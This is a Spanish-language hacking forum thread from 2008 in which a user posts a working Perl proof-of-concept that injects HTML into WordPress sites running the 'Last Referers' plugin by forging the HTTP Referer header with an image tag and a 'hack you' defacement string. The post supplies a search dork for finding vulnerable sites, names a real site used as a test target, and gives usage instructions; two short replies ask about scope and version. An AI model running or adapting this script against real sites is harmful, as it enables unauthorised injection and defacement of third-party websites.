WordPress Last Referers HTML INJECTION Proof of Concept

Iniciado por ZoneMx, 23 Enero 2008, 07:08 AM

0 Miembros y 1 Visitante están viendo este tema.

ZoneMx

Saludos pues aqui les dejo esto lo he estado probando y funciona
codigo en perl, sigo investigando.... ;D

#/usr/bin/perl
#zONEm mXC gEN
#perl test to insert html code to WordPress Last referers
#Worpress: Dork:Is proudly powered by Wordpress last referers
#test with http://nerra.com/broadsword/

use strict;
use warnings;
use LWP;

my $wordweb=shift or help();
my $agente = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => $wordweb);
my ($response,$referer);

banner();
        $referer="  '<img src='http://youserver/yourimage.png'>";
        $request->referer($referer);
        $response=$agente->request($request);
        $response->is_success or die "$wordweb : ",$response->message,"\n";
        $referer="  zoneM MxC hack you..";
        $request->referer($referer);
        $response=$agente->request($request);
        $response->is_success or die "$wordweb : ",$response->message,"\n";
        print "\nAhora se debe ver la imagen insertada en  Last Referers\n";
        print "\nMxC Gen Test\n";
sub banner{
        print "test to INJECT html code to Last Referers in Wordpress";
     
}
sub help{
        print "HTML LAST REFERERS WORDPRESS INJECTOR\n";
        print "PROOF OF CONCEPT\n";
     
        print "Proof by: ZoneM MxC Gen\n\n";
        print "UsO:\n";
        print "\tperl injeccion.pl [url]\n";
        print "\t[url]-WordPress Site \n";
        print "Example:\n";
        print "\tperl injeccion.pl http://sitiowordpress.org/\n";
        exit(0);
}

-sagitari-

Por lo que veo en el code, si no me equivoco , el código que inyectas en la web del wordpress es clientside, ¿no?...

salu2

6666

la verdad que si funciona!..pero que version? más datos exactamente.